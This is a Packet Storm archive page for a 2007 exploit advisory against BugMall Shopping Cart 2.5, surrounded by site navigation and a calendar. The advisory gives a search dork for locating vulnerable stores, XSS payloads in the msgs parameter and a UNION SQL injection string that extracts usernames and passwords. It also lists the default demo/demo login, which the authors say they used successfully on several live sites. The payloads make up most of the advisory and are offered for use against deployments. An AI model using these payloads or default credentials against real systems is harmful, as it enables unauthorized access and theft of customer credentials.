what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

bugmall-xss.txt

bugmall-xss.txt
Posted Jun 26, 2007
Authored by t0pp8uzz, xprog

BugMall Shopping Cart version 2.5 suffers from SQL injection and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | 46720fdcc675f6e7a4bc33504ba326fa6c45ade1f50aedacb27ec5225130d046
Download | Favorite | View

bugmall-xss.txt

Change Mirror Download
--==+================================================================================+==--
--==+           BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS       +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog (Excellent Work xprog thanks :D)


SCRIPT DOWNLOAD: http://www.bug-mall.org/downloads/bugmall.zip

ORIGINAL ADVISORY CAN BE FOUND HERE: http://www.h4cky0u.org/viewtopic.php?t=26834


SITE: http://www.bug-mall.org


DORK: Powered by Bug Software intext:Your Cart Contains


EXPLOITS:

EXPLOIT 1: http://www.site.com/BugMallPAth/index.php?msgs=[HTML, JAVASCRIPT]
EXPLOIT 2: The basic search box is vulnerable to sql injection, check examples for detail.
EXPLOIT 3: The script seems to have a default login, username:demo password: demo, we have tried this on several sites
and sucsefully logged in.


EXAMPLES:

EXAMPLE 1 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<html><body>VULN BY<br>t0pP8uZz<br>h4cky0u.org</body><html>
EXAMPLE 2 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<script>alert("XSS")</script>
EXAMPLE 3: Paste following into search box 
' and 1=2 UNION ALL SELECT 1,2,3,4,concat(username,':',password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102 from clientes/*


Note: Some servers may be running older version of MYSQL and make it harder to inject without UNION.

GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net

FROM GM!: Kw3[R]ln get over it :D.


--==+================================================================================+==--
--==+           BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITYS       +==--
--==+================================================================================+==--

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close